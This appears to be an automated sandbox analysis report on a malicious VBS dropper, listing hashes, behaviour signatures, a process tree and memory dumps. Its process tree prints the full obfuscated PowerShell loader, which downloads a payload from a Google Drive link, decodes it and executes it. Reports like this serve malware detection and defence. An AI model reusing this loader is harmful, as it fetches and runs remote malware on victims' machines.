Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-05-2024 06:59

General

  • Target

    20220830_ProtecoPTE..vbs

  • Size

    34KB

  • MD5

    928637e9b64c9425fde7ca14e03aa101

  • SHA1

    337201a455c055b2d79360bfb67ba81dbe64c4b0

  • SHA256

    fbbb12ff0da331f5eba7d3745ba7d2e0184e175176b316c373c461b047f7ba8e

  • SHA512

    5e34714a6b051073222ef2aa8bba45b50ab020bb875ee23057ae91508043badca490542b331c2ca5699f53db283a9399228da4e430fd06b42d3ec20c2fcd4b35

  • SSDEEP

    768:iE/pRPD/VQHfE5kAZ6/PEAJPPvv/P4WNHeCSwFbwv21ov3dT8IcXRQ/Ua9Sr1TjT:iupRPD/yHfakAZ6/PEAJPPX/P4WVeCSm

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20220830_ProtecoPTE..vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:344
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Harebur = 1;$Buffo230='S';$Buffo230+='ubstrin';$Buffo230+='g';Function Drottens190($Unthwarting){$Readvertizing=$Unthwarting.Length-$Harebur;For($Marianolatrist234=5; $Marianolatrist234 -lt $Readvertizing; $Marianolatrist234+=(6)){$Erantisers30+=$Unthwarting.$Buffo230.Invoke($Marianolatrist234, $Harebur);}$Erantisers30;}function direktricens($Besparede){& ($Lovligt) ($Besparede);}$nodebladenes=Drottens190 'IngleMunimaoPedalzespeiiForswlMischlna miaTo.si/Istem5Toldf.Loeft0O,ers Hover(pussyW UdspipalaenChitcdKim eoImucawSkibss Ante MacrNc imoT Tria Freds1A.dam0Swelp.Ca.em0Ine t;H ote JuteWOmspnidetacnOverr6 Afgo4Mokke;Styrt Plebix De.a6Ombru4Melle;Labor trowrKlattv B bl:Bispe1Bek.f2Unre 1 Calc.silk.0Unris)Trous krltoGConteeF.lkecgummakOverfovm el/O,blu2Listr0Rhyth1Komme0 Subf0Uhel.1 Unpr0Rrl n1,dfor Opf,gFRe.skiDia.yrEncloeHermefNav,soB,spox Kild/R.dis1mora 2Otto 1lager.Hemi.0Autho ';$Specialprventionerne=Drottens190 'VidetUGravesTeleteSrge,r Drif-MesioAKon,egI,dvieRosa nBingotJudi ';$Bordkortet=Drottens190 'He.lihVigent Ha et calpS,ndasKnage:Re,sl/Slav./ ,roddLndstrUropoiforl vDaimyePirat. EstigAmphioTreleo Kl.rgT.tchlO tbre Dorm.Su ercIndgaoAfmrkmEndo /Windbuanticc Efte?A,mode,rritxBiblipSmreroHairhrToec,tHgene=tn,ebd MaadoPoli wAsylonSpildlDesseoBfsbiaSortedCourg&.ammeiPestedOff.c=Godb.1SpunsZ.aydri euxaw VigtwAntikEHieroW I.frTRe,ism maalCSlvskWInter_Slavolm.ntaRNicolW B,lamGenomnTjenel doptvPaask_UdligHAspirJ foraUSa,an8PrudeYOppu,-Dayfl0rese oRkkefE,houlU Afg.lbol.e4lemlsdCh.mo ';$Kontingenteringernes=Drottens190 'Slagi>.oney ';$Lovligt=Drottens190 'Ov.raiLigeve SknsxFjern ';$Valutamarkedets='Lingvistens';direktricens (Drottens190 ' KredS Ng.ee Ultrt Ma.n-,tocaCOmnivo .ndenKlovntAltngeMur,nnAfrust Sond Spare-VideoP urra Resutunst,hTyndb Gi.syTPo.td:Tuata\N.ncuSRyg,aebustel h alvRivale,siltjliebeeE hemt Flets Schc.Bil.etAnalyxBeg,utUn er Bed.-SeekiV orfaa ProllSupe uHv,rveD rke ,emat$ quodVAn.imaForfrlBeskfu Holst SubsaProklm odeaas,urrLgelikOrchieRystndE,fure Pre,t A fesOutkn;Aco.o ');direktricens (Drottens190 ' TrstiDiamaf A od borat(T feltKnalleLott.sDrifttPoind-K nflpbook aPaleotKvasehAn,ic ThrusTTena,:Knipl\ggestSUforme.orphlMannov Molme JungjRec neEstu,tFol,esVenst. Doolt .njoxCatactFasta)Dulli{grnseeFngsexdestaiSteentdepos} Tatt;Winte ');$Blufferen = Drottens190 'FrarvenonadcGalinhvagtso Afsp ,ircu%Si keaMetacpSka.tpF gbedTransaZo,sptBondeaMod s%Al sk\ Dr vBOmforrAfl.deDuopoaParensd alotOpdrtwFr daeSolideR.diodEnvia.Kasu,QGraecuProceiDomme Aadri&oedem&Disin SkraaeafskycSagsghGrundoMo bi Utjsv$ Phth ';direktricens (Drottens190 ' Reno$ Ud,kgOpklol Ca.eoVrangbN klgaAbsorlDecap: ,ranKvrissvT.ileidyse,vGlossaAfs,vlTilsteAm,norSiliki overn.einfgSy iseGrundrRegiosOks,b=Diet,( ingmcKammemKategdSubch Trema/Afterc Sko Tilfl$Mir gBBotanlCitrousubsaf PredfHankae CornrvagtheTrillnC.tba)Mukke ');direktricens (Drottens190 ' Pant$Hy,osgEndoklTvivlo FredbCeleba AndelK.ndi:ProetI .olpnAnalod v deiMoerksFeltit S.ldiRhizonBejaegDonleuEpitoi Hares cierhEmissa .isdbOliebl.udsleBreadnHydr.eJordbsDoksasPatro=Polit$KultuB ForkoL.nierIn,erdRundvk,inisoCinnarJocketudjo eReceptBesto.AndensCroonpEcophl L.rsiE cultFemin( Dias$KluntKMascuo Top,n nsoptHeldiiDr,ugn Hikkg DepreLandfn ,echt Chi,eHemadr StyriRomannBehavgIngraeOmadrr Pel.nHindreRapidsAtror) Extu ');$Bordkortet=$Indistinguishableness[0];direktricens (Drottens190 ' .und$PhysigS livlfri,to .ilgbValena arlsl Mili:UndocF C.rdoApoutrspatimOmno,y.eratl F,le=BejelNRebuieHyperwHuara- FlyvO,rdokb In,ojFodboeEpulacLer atUafhn DisabS,alvay HalvsMarketFrit,eStresmGeogr.AuditN ekspeprecltW.rkb.AccruWStdpue SticbMonopCChieflP.nnoiPir.feAnadyn T,gnt Afkl ');direktricens (Drottens190 'ophio$KultuFB ghaoDepilr He.amTawhiy TranlDiate.TraadHChefre Brn,aEmbandUnstieUopnarOverbsDumpi[skumr$ TilhSReturpAns,te.hatocIn rai PriaaKapitlZombipBlaagr N igv rlseeHypern ApattTa,lei Felto DekanCrackeParabrquercnSubpreMidde]Cupca=Nedri$Symphnmon.mo,fbjed trgneS,resbColorlNitroaAfdredTilsteBrahmn GraveArve.sSa,li ');$Perlevennens=Drottens190 'TiderF.olleoUnpatrSlummmCopepy Svedlbruds.SalteDUstaboEnekawUngnanAfholl.agouoAntelaHost,dV.rvaF t aniForpal Sag.e,horo(Unslo$SitutB.ueino OxidrUncomdSkolek ygraoKom rrProsotintere.ncoltMajor,Chess$Simild UnbuiTrstulForeilUltraeP.eudn SalgiDeme,aUndvi)Konde ';$Perlevennens=$Kvivaleringers[1]+$Perlevennens;$dillenia=$Kvivaleringers[0];direktricens (Drottens190 'Lepid$ UlcegVandslFladvoT,ktabUdreda TalllMeth :Sus.rOGlacin Un rdSelefuEmboslUnadmeArnotrgungeeP.ahnnPetitdSammeeTvrve= Strm( Gr,nTpredreIberesPre eten.ob-MultiPPres axantht Wafth u,go Asp,r$D resdArctiiUdbrnl ajpllDe moeDolomnRusgiiRatioaPreun)Dynam ');while (!$Ondulerende) {direktricens (Drottens190 'Euoua$ TikagA istl Gleno sphebBityiaCharelovert:KegleDE.eceoAnimimTacklsSundep.rritrTorpoa OverkTrichs KrusiVidersForsysK.ffee altssShant=W,nni$BrstetForeprYngleuhedgeeRekni ') ;direktricens $Perlevennens;direktricens (Drottens190 'AppenSRifletpantnaTaarnrSideotannam-FundaS acklHotele Fi ae.umpepC nvi T.dji4Dorte ');direktricens (Drottens190 'Henre$Cotregarr,elBortvo EftebSkovla Reesl Pa,l:PubliObiop nMelandTinamuSqu.dlWarisePlo srClyteeEntanncognidWoo,yenumme= lnne( TattTArkiteSu rasVa antSp,ci-suk ePJobbia Pro,tTraadhUrusp ,astu$E,obrdMukkeiRodekl hobbl,idteeGranknExauniCon,iaPlie.)Goldh ') ;direktricens (Drottens190 'Sangr$,uddegSiglolUnlitoResbebKirkeaAirh,l ants:Sauv,DExpedeImidecAndeneAabenrC.austFors,iMarkefCl,ggyComfii AcetnU.harg.dvik=Esthe$BistrgSgmlslBrodso,kinhb Drmaa ,nselI tra:QuiddNChefrePliredVidenfAsystrFrytleBretenHemogdamfi eBernes afst+Omarb+Cario%Ge.ne$MdedeIVolubnPateldGir.kiN ndesFloretstar iDystrnReunigManomuAblueiUdlggs SlothhjemsaAntirbCoronlParsleSygeknOverfe Bortsd.talsDem.n.OmbrycEskado SpeauPhiesnsavagt Yvor ') ;$Bordkortet=$Indistinguishableness[$Decertifying];}direktricens (Drottens190 ' Forr$Ada tgKnurllnongroChilob Sk,laRrligl.aale:Unr.fESupernMulade Mu,iwPapul Seqrc= Prop BdepGHeilee Sigbtgar e-BortoC orneo UdtrnRe,netMooraeTypebnbeglotSulfu Outla$C mmodFremkiPrimrl Mis,lSikkeeus.renfin,aiCitriaSkatt ');direktricens (Drottens190 ' Vej,$ EvadgLngt lKondeoKl gebTheolaTrykllHerma:j.venVPolara Pe tlFremsuSlummeG.iff Ka,ku= Sche Udskr[SogneSAand y RemasKrs,ltQua reUdkasm Cera.vae eCGenbro Und nOpbe.v ,elseTrombrBrinetTitra]stift:Genne:HjemlFTrevlrStiknoRapgrmSkuesBKappeaT rrasTiltvePokya6 Fodb4SkrueSSkrmftP.stmrBehagiScav.nInveigSport(Prol $PartyEUmaadnIgnoreIndhowWinne) Coel ');direktricens (Drottens190 'trrep$Prydsg TilblBorgeoLiljeb.acroaBurgulGenke:.luggPboom.r.orgeeSterirAabeneRetreqBndeluFor tiBesgssfrilai InkotClinieSogne Photo=Phot, Kon,t[DiagnSZoospyBiog,s.ugtutrinkneAnkremFortr.Rema TIberieHemm,x disitAbrea.KortbESnftenP acoc Hj,moPegvod AwneiSgeomnKonomgSpont]Inton: can:ExcerAJrnamS Cre,CTacksIPeerlIMusik.AntibGKol.eeShib tKdebrSTeksttTh.ocrSa.seiTilorn,ilmcgMulti( De i$DeediVPi liaLimfalAbevauH.rvae ilst) over ');direktricens (Drottens190 ' Atla$ SandgForunlHenvioInsnabAn,toanyasclSp.un:UnminTBlazeaSacroemo.erlF,ues=gu,mi$ ByplPUnsavrMudgueRenser Diare DemoqBar,ouTil.ai estis KultiBand,tAmbroeAnthr..harms.uphruStackbSammesPebertJagthrBere iUberenNefengChaly(Depre3 Nond2Strit0 Proc6 Cai 8Conc.7archa, Nrkl2 Tram7Slisk7Indfl5Grubr3Gr yh),enum ');direktricens $Tael;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4792
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Breastweed.Qui && echo $"
        3⤵
          PID:1904

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1trkdvi5.pxc.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4792-2-0x00007FFB9CBD3000-0x00007FFB9CBD5000-memory.dmp

      Filesize

      8KB

    • memory/4792-12-0x000002C385FB0000-0x000002C385FD2000-memory.dmp

      Filesize

      136KB

    • memory/4792-13-0x00007FFB9CBD0000-0x00007FFB9D691000-memory.dmp

      Filesize

      10.8MB

    • memory/4792-14-0x00007FFB9CBD0000-0x00007FFB9D691000-memory.dmp

      Filesize

      10.8MB

    • memory/4792-15-0x00007FFB9CBD0000-0x00007FFB9D691000-memory.dmp

      Filesize

      10.8MB

    • memory/4792-20-0x00007FFB9CBD0000-0x00007FFB9D691000-memory.dmp

      Filesize

      10.8MB